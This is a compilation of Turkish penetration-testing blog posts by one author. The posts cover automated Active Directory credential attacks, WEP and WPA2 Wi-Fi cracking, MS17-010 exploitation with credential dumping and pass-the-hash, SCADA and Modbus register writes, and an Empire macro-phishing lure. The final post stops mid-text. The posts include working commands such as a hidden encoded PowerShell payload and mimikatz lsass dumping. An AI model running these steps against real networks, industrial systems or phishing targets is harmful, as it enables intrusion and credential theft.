icebreaker Aracı Nedir?

icebreaker aracı https://github.com/DanMcInerney/icebreaker adresinden ulaşabileceğiniz açık kaynak kodlu bir sızma testi aracıdır. Yerel ağda  bulunduğunuz fakat Active Directory dışında olduğunuz zamanlar size düz metin kimlik bilgilerini iletmek için Active Directory’ye karşı ağ saldırılarını otomatik hale getirir.  Yerel ağ testlerinde oldukça kullanışlı olan ve içinde bir çok aracı modül olarak bulunduran yeni bir araçtır.  Bu modüllerin bazıları Nmap, Empire, Responder, impacket gibi yerel ağ testlerinde sık sık kullandığımız araçlardan oluşmaktadır. Aşağıdaki resim ile araçta bulunan tüm modülleri görebilirsiniz.

5 farklı atağı sıra ile deneyerek açık metin parolaları ve bulduğu hash değerlerini  JohnTheRipper ile kırmaya çalışarak otomatik olarak atakları tamamlamaktadır.

RID Cycling Atağı

Nmap kullanarak boş SMB oturumlarını bulmaktadır.

SCF Dosya Yükleme Atağı

Ağ üzerinde anonim olarak yazılabilir paylaşımları bulmak için Nmap kullanır. Daha sonra böyle bir alan tespit ettiğinde SCF dosyası yükleme atağı gerçekleştirmektedir. Yakaladığı hash değerlerinide John ile kırmaya çalışmaktadır.

LLMNR/NBTNS/mDNS Poisoning Atağı

Bu atakta Resporder aracını kullanarak Katman  2 de  LLMNR/NBTNS/mDNS zehirleme atağı gerçekleştirmektedir. Yine yakaladığı hash değerlerinide John ile kırmaya çalışmaktadır.

SMB Relay Atağı

ntlmrelay.py ve Responder.py araçlarını kullanarak elde ettiği hashlerden john ile kırdığı parolaları kullanarak hedef makinaya bağlanarak admin kullanıcısı eklemeye çalışmaktadır. Bu adımdan sonra mimikatz aracını çalıştırıp bellekten parola ve hash dökümlerine ulaşabilirsiniz.

IPv6 DNS Poison Atağı

mitm6 ve ntlmrelayx.py araçlarını kullanarak  IPv6 DNS zehirleme yaparak  kulanıcı ve makina hash değerlerini yakalamaya çalışmaktadır. Kimlik doğrulama için sahte WPAD (Web Proxy Autodiscovery Protocol)  ler oluşturmaktadır. Bu kullanıcılar için ağ sorunlarına neden olabilir.

icebreaker Araç Kurulumu : 

Kali-Linux’a kuracaksanız kurulumdan önce apt-get remove python-impacket yapmanız gerekmektedir.

git clone https://github.com/DanMcInerney/icebreaker.git
cd icebreaker
./setup.sh
pipenv shell

Kurulum tamamlandığında bazı paketlerin eksik olduğu hatasını alabilirsiniz. Bunun için pip3 ile birlikte paketleri  yüklemelisiniz. Eğer pip3 yüklü değil ise ilk olarak  apt-get install python3-pip komutu ile onu kurmalısınız. Daha sonra eksik olan paketleri aşağıdaki komutlar ile birlikte kullanabilirsiniz.

pip3 install libtmux
pip3 install netifaces
pip3 install python-libnmap
pip3 install netaddr

Paketleride kurduktan sonra  python3 icebreaker.py -h  veya ./icebreaker.py -h komutları ile aracın parametrelerini görebilirsiniz.

icebreaker aracını isterseniz target.txt veya nmap tarama sonuçlarını vererek  çalıştırabilirsiniz.

python3 icebreaker.py -l targets.txt -i eth0 -t 30 -c default komutu ile  target.txt dosyasındaki IP adresi/adresleri için 30 dakika boyunca LLMNR/NBTNS poisining atağı gerçekleştirecektir. Sistemde çalıştırılacak komut için -c parametresi ile belirtebilirsiniz.

Gördüğünüz gibi yakaladığı hash değerini John ile kırarak açık metin parolasını göstermektedir. Aynı zamanda aracın dizinindede tutulmaktaır. Daha sonra gerekli olduğunda hash değerini ve açık metin parolaya aşağıdaki resimde görüldüğü gibi ulaşılabilmektedir.

Hedef sistemde yakaladığı hash değerleri ve ele geçirdiği açık metin parolalar ile bağlanarak komut çalıştırabilmektedir. Bunun için Empire ile powershell kullanılmaktadır.

./icebreaker -l targets.txt -c “powershell -nop -w hidden -exec bypass -enc WwFk…”

Araç bir çok atağı ve aracı  otomatik  hale  getirdiğini gördüğümde paylaşmak istedim  başka bir yazıda görüşmek üzere ?

TR | Yerel Ağ Sızma Testlerinde icebreaker Araç Kullanımı Ahmet Gürel

Bu yazıyı okumaya  başlamadan önce temel kavramlar ve terimler için Kablosuz Ağ Saldırıları -1 WEP Şifreleme ve Parolasını Ele Geçirme  adlı yazımızı okumanızı tavsiye etmekteyim.

Bir önceki yazıda WEP protokolünün zayıflıklarını ve parolasını ele geçirmeye değinmiştim bu yazıda ise günümüzde yaygın olarak kullanılan WPA/WPA2 şifreleme algoritmaları ve parolalarını ele geçirilmesine yönelik saldırılara değineceğim. Kullanacağımız donanım ve yazılımlar WEP için kullandıklarımızın aynısı olan aircrack yazılım ailesini kullanacağız.

WPA ve WPA2 şifrelemesini kullanan bir Erişim  noktasının (Access Point)  parolasını ele geçirebilmek için havada yakalanan paketlerde istemci ile erişim noktası arasında gerçekleşen dörtlü el sıkışma trafiği üzerine  kaba kuvvet (Brute force) saldırısı kullanılabilir.

İlk olarak airmon-ng start wlan0  komutu ile wifi adaptörümüzü monitor moda alıyoruz.

Daha sonra airodump-ng wlan0mon  komutu ile çevredeki ağlar hakkında bilgi topluyoruz.

Buradan ESSID Ahmet-Test  olan BSSID 14:5F:94:48:F7:04  olan ve Channel numarası 1 olan WPA2-PSK şifrelemesini kullanan erişim noktasını hedef alacağız.

Artık bu ağı hedef göstererek aşağıdaki araç ve komutlar ile  paket toplamaya  başlıyoruz.

Görüldüğü gibi havada giden paketler toplanarak kaydedilmektedir.

Dörtlü el sıkışma paketlerini yakalabilmemiz için bağlı olan istemcilere deauthentication paketleri gönderek ağdan düşüp yeniden bağlanmasını sağlamak için aireplay-ng –deauth 100 -e Ahmet-Test wlan0mon  aireplay-ng aracını kullanıyoruz.

Artık düşen istemci yeniden erişim noktasına bağlanırken dörtlü el sıkışma gerçekleşicek ve bu paketleri bizde yakalarak kaydetmiş olacağız.

aircrack-ng WPA2-01.cap -w /usr/share/wordlist/rockyou.txt -o  komutu ile yakalanan paketler üzerine kaba kuvvet saldırı gerçekleştirilmiştir. Bu parola listemizde (wordlist) kablosuz ağa ait parola bulunduğu için parola bulunmuştur. Tamamen listenizde parola var ise işe yarayan bir saldırıdır. Dörtlü el sıkışma paketleri üzerinden kaba kuvvet saldırısı ile WPA/WPA2 şifreleme protokollerini kullanan ağların parolası bu  şekilde ele geçirilebilmektedir.

WPS PIN Kırma ve WPS PIN Bilinen Ağ Parolasını Elde Etme

Bu saldırıdan başka şifreleme protokolleri haricinde erişim noktaları ile aygıtları birbirine bağlamasını kolaylaştırmak amacı taşıyan Wi-Fi Protected Setup (WPS) PIN’i ilede gerçekleşen saldırılar  vardır.

TR | Kablosuz Ağ Saldırıları-2 WPA/WPA2 Şifrelemeleri ve Parola Ele Geçirme Ahmet Gürel

Wi-Fi ağınızın güvenliğini sağlamak için ortaya çıkmış şifreleme yöntemleri vardır,
bu şifreleme yöntemlerinden biri WEP (Wired Equivalent Privacy) dir.

Wired Equivalent Privacy (WEP), dünyada en çok kullanılan Wi-Fi güvenlik
algoritması. Bunun sebebi ise, geriye uyumluluğu ve birçok router’ın kontrol
panelinde ilk sırada yer alması.

WEP 64-bit olarak çıktı fakat sonra 128-bit’e çıkarıldı. Günümüzde 256-bit WEP
şifrelemesi mevcut olsa da, 128-bit şifreleme halen en yaygın olarak kullanılan.

Algoritmadaki bir çok düzeltmeye ve arttırılan anahtar boyutuna rağmen, WEP
standardında zaman içinde birçok güvenlik açığı keşfedildi. Ücretsiz araçlar ile
kolaylıkla kıralabilmeltedir.(Aircrack vb.) WEP 2004 yılında resmi olarak bitirildi.

WEP ağına bağlanılırken aşağıdaki gibi  kimlik doğrulama gerçekleşir.

WEP Algoritmasının 3 Önemli Amacı : 

• Kimlik Doğrulama (Authentication)
• Gizlilik (Privacy)
• Bilgi Değiştirme Kontrolu (Message Modification Control)

WEP’in teknik altyapısı RC4 (Rivest Cipher) akış şifreleme algoritmasına dayanır. RC4’ün amacı, verilen bir gizli anahtar ile geniş uzunlukta rastgele sayılar üretmek ve daha sonra bu akışla göndericide düz metin mesajı şifrelemektir.Mesajın şifrelenmesinin çözümü ve şifrelemesi temel olarak XOR fonksiyonu ile yapılmaktadır. WEP onay sisteminde RC4 ile  iki defa XOR lanan sonuç aynı değeri vermektedir.  IV (Initialization Vector)  paketleri WEP de düşük boyutta olduğu için tekrara neden olabiliyor. IV (Initialization Vector)  gerçek anahtara eklenilip RC4 işleme giriyor dolayısıyla her IV değiştirildiğinde RC4 tekrar şifrelemeye başlıyor. Yeterince tekrar etmeyen IV (Initialization Vector)   paket topladığında WEP parolası  kırılabilmektedir.

WEP Parolasını Ele Geçirme Adımları:

Başlamadan önce;

• Kendi cihazımızın MAC adresi = iwconfig ya da ifconfig komutu ile görebilirsiniz.
• BSSID  =  Hedef  Mac Adresi
• ESSID  =  Hedef Kablosuz Ağ adı
• Channel = Yayın yapılan kanal numarası

bu terimlerin açılımını öğrendikten sonra Kali Linux üzerindeki Aircrack araç ailesini kullarak kıracağız. Donanım olarak TP-LINK TL-WN727N adaptörünü kullanacağım.

ifconfig wlan0 ve ya iwconfig komutları ile kablosuz adaptörümüzü görüntüleyebiliriz.

airmon-ng start wlan0 komutu ile  adaptörümüzü  monitor moda alıyoruz.

Yukarıdaki resimde gördüğümüz gibi wlan0 monitor moda geçerek wlan0mon olmuştur.

airodump-ng wlan0mon komutu ile etraftaki paketleri dinleyerek kablosuz ağlar hakkında bilgi topluyoruz. Yukarıda ki resimde gördüğümüz gibi BSSID, ESSID ve Channel bilgileri görüntülenmektedir.

Terminalimize wifite yazarak aracımızı başka bir aracımızı açıyoruz. WPS ve Clients bilgilerini görebilmekteyiz.

Yukarıda topladığımız bilgilere göre ESSID Ahmet-Test BSSID 3C:DF:BD:EC:E8:5A olan Channel numarası 10 olan ve WEP protokolünü kullanan erişim noktasını hedef alacağız.

airodump-ng wlan0mon -c 10 –bssid 3C:DF:BD:EC:E8:5A -w WEP komutu ile Ahmet-Test eişin noktasının paketlerini toplayarak -w parametresi ile bulunduğu dizine kaydetmesini sağlıyoruz.

aireplay-ng -1 1 -a 3C:DF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ile fake authentication oluşturarak daha hızlı bir şekilde paket toplama işlemi gerçekleştireceğiz. -1 ile fake authentication üreteceğimizi aireplay-ng aracına belirttikden sonra kaç saniyede bir gönderileceğini girdik. -a parametresi ile BSSID  (Hedef Mac adresini) giriyoruz. -h ile kendi adaptörümüzün mac adresini giriyoruz ve fake authentication  paketleri gönderiyoruz.

aireplay-ng -3 -b 3C:DF:BD:EC:E8:5A -h D4:6E:0E:1A:32:26 wlan0mon komutu ilede IV (Initialization Vector)  paketi oluşturmak için ARP paketlerini yakalayıp sürekli olarak  tekrarlamaktadır.

aircrack-ng WEP-01.cap komutu ile yeterli sayıda IV (Initialization Vector)  paketi toplandığında WEP parolası kırılmaktadır.

TR| Kablosuz Ağ Saldırıları -1 WEP Şifreleme ve Parolasını Ele Geçirme Ahmet Gürel

Herkese Merhaba,

Bu yazıda birlikte MS17-010 zafiyeti bulunan bir bilgisayardan kurum içi sızma testi senaryosu canlandıracağız. MS17-010 zafiyeti Metasploit  güvenlik çatısı altında modülü bulunmaktadır. ( exploit/windows/smb/ms17_010_eternalblue ) Fakat bu modül sadece x64 mimari yanı 64 bit işletim sistemlerinde çalışmaktadır. x86 yani 32 bit işletim sistemlerinde çaresiz kalmaktadır. Ayrıca bunun dışında metasploit  popüler bir çatı olduğu için  güvenlik ürünleri tarafında yakalanıp engellenebilmektedir. Bu MS17-010 zafiyetinde geçerli olduğu gibi bir çok zafiyetin metasploit ile sömürülmeye çalışıldığında kurumlarda başarılı olunmamakta ve otomatik yerine el ile sömürme işlemi gerçekleştirilmektedir. Yine aynı şekilde metasploit modülü olan PsExec ile hash’ı alınan bir makinaya bağlanabiliyoruz fakat  güvenlik ürünleri bu bağlantılarıda tanıyıp kesebiliyor. Yazının devamında bu yöntemlere ve alternatiflerine değinmeye çalışacağım.

İlk olarak en basitten başlayarak hedef makina/ip üzerinden zafiyeti tespit edip metasploit ile sızmaya çalışalım.

Nmap Script Engine (NSE) ile MS17-010 zafiyetinin olup olmadığını test ediyoruz. Resimde görüldüğü gibi VULNERABLE olarak çıktı vermekte. Bu makinada MS17-010 zafiyeti bulunmakta. NSE harici Metasploit ile use auxiliary/scanner/smb/smb_ms17_010 diyerekde zafiyetin olup olmadığını test edebilirsiniz.

Artık metasploit’i açarak use exploit/windows/smb/ms17_010_eternalblue diyerek MS17-010 zafiyetini metasploit ile sömürebiliriz.

Burada gördüğünüz gibi Exploit  target kısmında sadece x64 desteklenmektedir. Burada Payload olarak windows/x64/meterpreter/reverse_tcp payloadu kullanılmıştır. windows/x64/meterpreter/bind_tcp payloadıda farklı senaryolarda işinize görecektir.

Meterpreter komut satırına düştük buradan sonra meterpreter’in gelişmiş yeteneklerini kullanabilirsiniz ya da shell diyerek windows cmd satırına düşebilirsiniz.  Windows tarafındaki en yetkili kulanıcı hakları olan NT AUTHORITY\SYSTEM  yetkileri ile sisteme giriş yapıldığından dolayı  bellekten hash ve parola çıkarma işlemleri yapılabilir.

Yukarıdaki resimlerde  görüldüğü gibi meterpreter üzerinde hashdump ve mimikatz kullanılarak kullanıcı hash ve parolalarını elde edebildik.   incoginito aracı  ile  kullanıcı tokenları arasında değiştirebildik.

Meterpreter ile sisteme sızmış olmasaydık cmd üzerinden yine procdump.exe aracını hedef makinaya indirerek cmd üzerinden procdump ile lsass.exe dumpını alarabiliriz.

C:\procdump.exe -accepteula -ma lsass.exe dump.dmp

Oluşturduğumuz lsaass.exe’nin dump.dmp  dosyasını kendi makinamıza indirerek kendi makınamızda mimikatz  ile aşağıdaki komutlar ile inceleyebiliriz.

mimikatz.exe

privilege::debug

sekurlsa::minidump dump.dmp

sekurlsa::logonPasswords

Ayrıca windows üzerinden sam ve system dosyalarını çıkartıp birleştirerek kullanıcı hashlerini elde edebiliriz. samdump2 aracı Kali Linux’ta yüklü olarak gelmektedir.

reg save hklm\sam c:\sam
reg save hklm\system c:\system

samdump2 system sam 

Bu şekilde meterpreter dışındada windows makinalar üzerinde hash ve parolaları manuel olarak elde edebiliriz.

CrackMapExec ile elde edilen hash ve parolalar subnet ve domaindeki tüm makinalarda bu parola veya hash  Local Admin  hakları ile çalışıyorsa yukarıdaki resimdeki gibi  Pwn3d!  yazmaktadır. Bu aşamadan sonra isterseniz CME (Crack Map Exec) ile makinalardaki tokenları toplayabilir ya da bu makinalara bu hash ya da parolalar ile PsExec,SMBExec ya da WCE ile  giriş yapılıp manuel olarak bu işlemleri gerçekleştirilebilir.

Metasploit’i açtıktan sonra use exploit/windows/smb/psexec  diyerek  metasploit  ile giriş yapabilmekteyiz. Fakat başta söylediğim gibi bazı durumlarda güvenlik ürünleri tarafından tespit edilip kesilmektedir. Bunun için PsExec’e alternatif olarak Python’ın  impacket modülünde  bulunan  smbexec.py  işimizi görmektedir.

Windows bir makinadan hash ile hedef makinaya bağlanmak için Windows Credentiol Editor (WCE)  ile bağlanılabilir.

wce.exe -l
wce.exe -g testlerdeyim
wce.exe -s <Kullanıcıadı>:<Domain/yadamakinaipsi>:<LM Hash>:<NTLM Hash>
net use ipADMIN$
PsExec.exe IPADRESİ -s cmd

Buraya kadar MS17-010 zafiyeti ile sisteme sızılıp daha sonra kurum içindeki yada Domainde ki  diğer makinalarda aynı hashlerin tespiti bu makinalara hash ya da parola ile bağlanıp o makinalarda ki hash ve parolaları manuel ve otomatik şekilde elde etmeyi inceledik. Domainde bulunan her makina üzerinden hash,parola ve tokenlar toplandıkça bunların içinde Domain Admin yetkileri ile çalışan kullanıcı parola,token ve hash’ine rastlamanız olası. Bu yetkide kullanıcılara ulaşabilirseniz DC makinalarıda artık elinizde demektedir. MS17-010 zafiyeti metasploit modülü x86 versiyonundan kaynaklı ya da güvenlik ürünlerinin engellemesinden kaynaklı kesilebilirdi. Bu durumda fuzzbunch ile  önüne geçebiliriz. x86 ve x64 işletim sistemi mimarilerinde çalışıp aynı zamanda bir çok güvenlik ürününe takılmadan başarı ile çalışmaktadır. Fuzzbunch’i çalıştırmak için hedef dışında Windows XP bir makina ve atak yapılacak,DLL oluşturulacak ve   bağlantının dinleneceği bir makina (Örn: Kali Linux)  daha kullanılmaktaydı. Bu süreci kolaylaştırmak için wine yazılımı ile Kali Linux üzerine  Fuzzbunch kurulum imkanı sağlayan Kali/fuzzbunch-debian  yazılımı linkteki sayfadaki yönergeler ile kurabilirsiniz.

Fuzzbunch-Debian Kurulum Komutları:

1- apt update

2- apt install wine winbind winetricks

3- dpkg –add-architecture i386 && apt-get update && apt-get install wine32

4- WINEPREFIX=”$HOME/.wine-fuzzbunch” WINEARCH=win32 wine wineboot

5- export WINEPREFIX=$HOME/.wine-fuzzbunch

6- wine regedit.exe

7- regedit açıldıktan sonra sağa tıklayıp Add String Value diyerek Type kısmına  String Name kısmına PATH  Value kısmına  c:\\windows;c:\\windows\\system;C:\\Python26;C:\\fuzzbunch-debian\\windows\\fuzzbunch  değerlerini girerek çıkıyoruz.

8- cd $HOME/.wine-fuzzbunch/drive_c

9- git clone https://github.com/mdiazcl/fuzzbunch-debian.git

10- winetricks python26

11- cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows

12- wine cmd.exe

13- python fb.py

Kali/fuzzbunch-debian  kurarak Windows XP bağımlılığından kurtularak tek bir saldırgan makina ile atağı gerçekleştirebiliriz.

python fb.py ile fuzzbunch açıldığında yukarıda ki resimdeki ekran gelmektedir. 0 New project diyip isim verip  Target (Sızılacak Hedef IP)  ve Callback (Bağlantı gelecek bizim IP) değişkenlerini girerek enter tuşu ile değişkenlerin varsayılan değerlerini onaylayarak ilerliyoruz.

use Eternalblue diyerek MS17-010 Eternalblue exploitini kullanacağız.

Resimlerde ki parametreler girilip execute dediğimizde Eternalblue başarılı bir şekilde çalışmaktadır.

Eternalblue başarılı bir şekilde hedefte çalıştıkdan sonra use Doublepulsar  diyerek exploiti tamamlayacağız.

Bu resimde görüldüğü gibi işletim sisteminin mimarisini sormakta. Metasploit modülünde sadece x64 seçeneği mevcut.

Bizim hedef makinamız x64 olduğu için 1 diyerek devam ediyoruz. Function kısmında exploitin çalışıp çalışmadığını denemek için 1 seçerek Ping komutu çalıştırıyoruz.

Ve komutumuz başarılı bir şekilde çalıştı. Artık 2 numaralı  Run DLL Function’ı çalıştırıp kendimize DLL üretip onu hedef sistemde çalıştırarak shell alabiliriz.

MSFVenom ile x64 bir DLL üreterek bunu fuzzbunch’in kurulu olduğu dizine taşıyoruz.

Yukarıda ki resimde görüldüğü gibi set Function RunDLL diyerek functionımızı seçiyoruz. DLLOrdinal ve  DLLPayload değişkenlerini girdikten sonra execute ile Doublepulsar’ı çalıştırıyoruz.

Başarılı bir şekilde çalıştı.

Doublepulsar’ı çalıştırmadan önce DLL’i oluştururken kullandığımız IP adresli makinada  multi/handler modülü ile IP ve port numarasını dinlemeye başlıyoruz. Doublepulsar başarılı bir şekilde çalıştığında hedef makinadan shell gelmektedir.

Fuzzbunch ile DLL injecte ederken bunu MSFVenom yerine Empire ile DLL oluşturup onu Doublepulsar ile hedefte çalıştırarak gelen shell bağlantısını agent olarak  Empire üzerinden kullanabilirsiniz.

Resimlerde görüldüğü gibi Empire ile DLL oluşturulup fuzzbunch dizinine taşınıp Doublepulsar DLLPath değişkenine bu DLL verilip  çalıştırıldığında Empire agent’ı başarılı bir şekilde oluşmaktadır. Agent oluştukdan sonra Empire ile post exploitation  yapabilirsiniz. Empire kurulum ve kullanımı adlı  yazıma buradan ulaşabilirsiniz.

Bir başka yazıda görüşmek üzere.

TR | Yerel Ağ Sızma Testi Senaryosunda Kullanılabilecek Araç ve Yöntemler Ahmet Gürel

SCADA açılımı Supervisory Control And Data Acquisition yani “Merkezi Denetleme Kontrol ve Veri Toplama” sistemidir. Kritik sistemlerin ve tesislerin  merkezi olarak izlenmesine olanak veren sistemdir.

SCADA Sistemlerinin Başlıca Özellikleri

• Grafik Arayüz
• İzleme Sistemi
• Alarm Sistemi
• Veri Toplama, Analiz ve Raporlama Sistemleridir.

SCADA üç temel bölümden oluşur;

• Uzak Uç Birim (Remote Terminal Unit (RTU) )
• İletişim Sistemi
• Kontrol Merkezi Sistemi (Ana Kontrol Merkezi AKM – Master Terminal Unit MTU)

İletişim Protokolleri

RS232 / RS422 / RS485 / Modbus protokolleri, bir Modbus cihazını bir veya daha fazla genel seri cihaz (örneğin, yazıcılar, barkod tarayıcılar  ve benzeri) ile birçok cihaz bilgisayarlara veya birbirlerine bağlanabilmeye izin verir.

SCADA’nın Kullanım Alanları

• Nükleer Tesisler
• Elektrik Tesisleri
• Su Toplama-Arıtma-Dağıtım Tesisleri
• Trafik Kontrol Sistemleri
• Otomotiv Endüstrisi
• Doğalgaz Tesisleri
• Kısaca aklımıza gelebilecek endüstriyel otomasyon sistemlerinde kullanılmaktadır.

SCADA Sistemleri hakkında genel bilgileri verdikten sonra gelelim SCADA Network ve Güvenliğine :

Yukarıda gördüğünüz örnek bir SCADA Network topolojisidir. Uzakdaki  PLC istasyonlarından sensörlerden toplanan verileri toplayarak merkezi olarak denetlenmesini sağlamaktadır.

Yukarıda Modbus protokolunun SCADA içinde kullanım örneği görülmektedir. MODBUS protokolü seri port ve internet protokollerini kullanarak haberleşme yapar. ( MODBUS RTU, MODBUS ASCII,MODBUS PLUS, MODBUS TCP/IP )

SCADA Sistemlerinde Güvenlik Riskleri

• SCADA Yazılımlarında bulunan zafiyetler
• SCADA Network Protokol ve Cihazlarında  bulunan zafiyetler
• Dışa açık SCADA Kontrol ve Yönetim Panellerinde Ön tanımlı parola kullanımı
• Kullanılan işletim sistemlerinde bulunan zafiyetler

yukarıda ki adımlar SCADA sistemlerinde güvenlik açısından büyük risk oluşturmaktadır.

SCADA Sistemlerinde güvenlik için kontrol edilebilecek noktalar

• Cihazlar fabrika varsayılan kimlik bilgileri kullanıyor mu?
• SCADA Network Protokol ve Cihazları  güncel mi?
• PLC’lere erişim yalnızca yetkili makineler için beyaz listeye alınmış mı? Her yerden erişilebilir olmamalıdır.
• SCADA ağı şebekenin geri kalanından ayrı mı? Eğer değilse, kurumsal iş istasyonlarından PLC’lere ulaşmayı deneyin.
• SCADA kontrol merkezine fiziksel erişim sınırlı mı?
• Denetleyici makineden internete erişebilir misin?
• SCADA ağında çalışan açık metin hizmetleri var mı?
• Kurum sıkı bir parola politikası izliyor mu?
• Denetleyici makineleri, iş istasyonları ve sunucular güncel mi? (Eski sürüm zafiyerleri MS08-067,MS17-010 vb.)
• Anti-virüs yazılımı çalıştırıyorlar mı? ve uygulama beyaz listesine zorla uygulanıyor mu?

Örnek SCADA Sızma Testi  Uygulamaları : 

SCADA Network’unde bulunabilecek bir Windows XP işletim sistemi üzerine  ABB MicroSCADA Pro SYS600 9.3 yazılımı ve Modbus client yazılımı  olan Modbus Pal 1.6b yazılımları kurulmuştur. Bu makina üzerinden örnek bir kaç senaryo incelenecektir.

İlk olarak yazılımlara geçmeden önce kullanılan işletim sisteminin güncel olması ve zafiyetlerden etkilenmemesi gereklidir. Yukarıda gördüğünüz gibi kullanılan Windows XP makina MS08-067 zafiyetinden etkilenmektedir ve sisteme metasploitin exploit/windows/smb/ms08_067_netapi  exploiti ile sızılmıştır.

Yukarıda ki resimde ABB MicroSCADA Pro SYS600 9.3 ve Modbus TCP/IP protokolünü kullanan Modbus Pal 1.6b  Client uygulamalası görülmektedir.

Modbus TCP port 502 üzerinden çalışmaktadır. Modbus TCP/IP açık metinli bir protokoldür. Ortadaki adam saldırılarına açıktır. (MitM)

nmap –script modbus-discover.nse –script-args=’modbus-discover.aggressive=true’ –scan-delay=1 -p 502 <host> 

Yukarıda ki Nmap Script Engine  (NSE) ile Modbus protokol kullanımını tespit edebilirsiniz.

Metasploitin auxiliary/scanner/scada/modbusclient  modülü Modbus protokolünü kullanarak bir PLC’ye veri okuma ve yazma imkanı verir.  Aşağıda metasploite girilen DATA_ADRESS  0 yukarıda ki  resimde gördüğünüz 1. değere,DATA_ADRESS   2  yazıldığında ise  3. değeri okuyup getirdiği görülmektedir.

Modbus protokolü üzerinde Data adreslerinde ki değerleri okuyabildiğimiz gibi yazma işlemide gerçekleştirilebilmektedir. auxiliary/scanner/scada/modbusclient modülüne set ACTION WRITE_REGISTER  komutunu girdikten sonra istenilen DATA_ADRESS belirtildekten sonra yazılmak istenen değer DATA değişkeninde belirtilerek işlem gerçekleştirilebilir.

DATA_ADRESS olarak 0 girilip DATA olarak 57 verisi girildiği için Modbus Pal 1.6b yazılımında yazan ilk değer 0 dan 57 ye değişmiştir.

Bunun haricinde Nmap’in scada için olan NSE’lerine buradan ulaşabilirsiniz.

ABB MicroSCADA uygulamasında wserver.exe  uzaktan kod yürütme zafiyetinden etkilenmektedir.
ABB MicroSCADA’daki uzaktan Stack tabanlı Buffer Overflow güvenlik açığı bulunmaktadır. Zafiyet , komut çalıştırmayı sağlayan wserver.exe bileşenindeki kimliği doğrulanmamış EXECUTE işlemlerinin işlenmesinden kaynaklanmaktadır. Wserver.exe bileşeni varsayılan olarak devre dışıdır, ancak bir proje SCIL işlevini WORKSTATION_CALL kullandığında gereklidir. Scada Network ile haberleşmesi için açıldığında güvenlik zafiyeti oluşturmaktadır.

Metasploit ile exploit/windows/scada/abb_wserver_exec exploiti kullanılarak yazılım üzerinden sisteme sızılabilir.

ABB MicroSCADA Pro SYS600 9.3 yazılımında bulunan zafiyet ile sisteme sızılmıştır. Kurulu olan  SCADA yazılımlarının en güncel versiyonda çalışıp ve üzerinde zafiyet bulunmadığından emin olmalısınız.

İşletim sistemi zafiyetleri, Modbusprotokol zafiyetleri ve SCADA yazılım zafiyetlerinin basit birer uygulamasını tamamlamış olduk. Farklı SCADA yazılımlarında benzer ve ya farklı zafiyetler bulunabilir. Bunun dışında da oldukça basit görülen fakat en az bunlar kadar kritik olan ön tanımlı kullanıcı adı ve parola kullanımı/kurulumu yapılmış yazılımlardır.

Yukarıda ki resimde bulunan WAGO yazılımı SCADA yazılımlarının web tabanlı yönetim panelidir. Bu web tabanlı yönetim panelleri internete açık bir şekilde bırakılmamalıdır. Dışarıdan erişilmesi gerekiyorsa IP kısıtlaması veya VPN kullanılmalıdır. WAGO üzerinden tüm servis, port ve sistem hakkındaki tüm bilgilere erişilip hatta sistemi yeniden başlatılabilir.

Yukarıda ki resimde WAGO web tabanlı yönetim panelinin varsayılan parolaları görülmektedir. Bunlar herkese açık bir şekilde bulunmaktadır. Hem dışa açık hemde ön tanımlı kullanıcı adı ve parola kullanımı oldukça kötü sonuçlara neden olabilir. SCADA yazılım ve sistemlerinin ön tanımlı kullanıcı adı ve parolalarına buradan ulaşabilirsiniz.

SCADA sistemlerini test ederken kullanabileceğiniz bir çok aracın listesine buradan ulaşabilirsiniz.

Güvenli günler dilerim.

Kaynaklar :

• http://www.elektrikrehberiniz.com/elektronik/modbus-nedir-10834
• http://www.elektrikport.com/teknik-kutuphane/modbus-nedir/17063
• http://www.elektrikport.com/teknik-kutuphane/scada-nedir-elektrikport-akademi/8051

TR | SCADA Sistemleri ve Güvenliği Ahmet Gürel

Herkese Merhabalar,

Bu yazımda yine Empire ile bir senaryo üzerinden gideceğiz. Bundan önceki yazımda  Empire Post Exploitation Araç Kurulumu ve Kullanımı adlı bir yazıydı. Bu yazının sonunda Empire kullanarak Macro kodu ile powershell payloadı üretmeye değinmiştim. Fakat yazının sonunda kısaca değindiğim için uygulama kısmında sorun yaşayanlar olmuş, onun için ikinci bir yazı ile değineyim dedim. İlk yazıyı okumayanlar okuduktan sonra bu yazıyı okursa daha faydalı olacaktır diye düşünüyorum.

Empire açtıktan sonra resimde görüldüğü gibi eğer listener yoksa uselistener komutu ile bir adet listener oluşturuyoruz.

info komutu ile listener hakkınad parametre bilgilerini görüntüleyip değişlikler yapabilirsiniz. set komutu ile parametrelere değer girebilir/değiştirebilirsiniz.

usestager windows/macro Listener_Adı komutu ile stager kullanıp macro olarak powershell payloadı oluşturabilmekteyiz.

Artık macro kodumuz hazır. Bunu istere Word ister Excel dosyasına macro olarak gömebilir, sosyal mühendislik çalışması için kullanabilirsiniz. Masraf Formu.xls  ya da CV.doc şeklinde insanların ilgisini çekecek biçimde göndererek açmasını sağlayarak hedefte erişim sağlayabilirsiniz.

Bu kısımda denemek için ben word dosyası açıp, Görünüm ->Makrolar a tıklayarak bir makro oluşturdum.

Empire ile oluşturduğumuz macro kodumuzu kopyalıyoruz.

Yaptığımız işlemleri kaydettikden sonra, farklı kaydet diyerek Word 97-2003 dosyası olarak kayıt ediyoruz. Artık dosyamız hazır hedefe göndereceğimiz son şeklinde, bir senaryo ile hedefe gönderip açtırmak hayal gücünüze ve yeteneğinize kalıyor.

Dosyayı açtığımızda macroyu etkinleştirme uyarısı gelmekte, eğer hedefiniz dosyaya güvenip İçeriği Etkinleştir’e tıklarsa her şey başarılı bir şekilde gerçekleşecektir.

Başarılı bir şekilde listenerımıza bağlantı geldi ve agentımız oluştu.

Sistem bilgileri bu şekilde karşımızda, bundan sonra Empire Post Exploitation aşamaları kolaylıkla gerçekleşmektedir, bir önceki yazıda bulunmakta bu aşamalar.

Başka bir yazıda görüşmek üzere.

TR | Empire ile Office Macro Phishing Saldırısı Hazırlamak Ahmet Gürel

Empire, PowerShell ve Python kullanan bir post-exploitation aracıdır. Oldukça pratik ve gelişmiş özellikleri vardır. İçinde exploit bulunmamaktadır. Sadece payloadlar üretmekde ve listener bulundurmaktadır. Bunun haricinde sızma testinde post-exploitation aşamasında kullanılacak bir çok modül vardır. Powershell kullandığı için kurumlardaki antivirus gibi güvenlik yazılımlarına yakalanmadan işlem yapıp shell sağlayabilmektedir. Gelişmiş sosyal mühendislik saldırıları için macro payloadları üretebilmektedir.

Kurulum:

git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh

Kullanımı:

